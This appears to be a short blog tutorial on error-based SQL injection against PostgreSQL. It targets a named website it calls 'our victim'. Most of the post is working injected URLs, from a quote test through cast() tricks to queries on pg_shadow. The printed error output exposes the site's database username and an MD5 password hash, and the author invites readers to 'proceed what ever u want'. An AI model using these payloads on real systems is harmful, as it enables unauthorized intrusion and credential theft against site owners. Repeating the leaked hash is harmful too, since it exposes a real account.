our victim is
Code:
http://www.creatop.com.cntry to put ' at the url.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'Code:
ERROR: syntax error at or near "''"When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0So, I know this is either blind sql or error based sql.
I try using error based method.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this form
Code:
cast((your sql command/query) as int)Code:
ERROR: invalid input syntax for integer: "pg_type"We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)Code:
ERROR: invalid input syntax for integer: "postgres"How about the passwd??
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.
References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/
No comments:
Post a Comment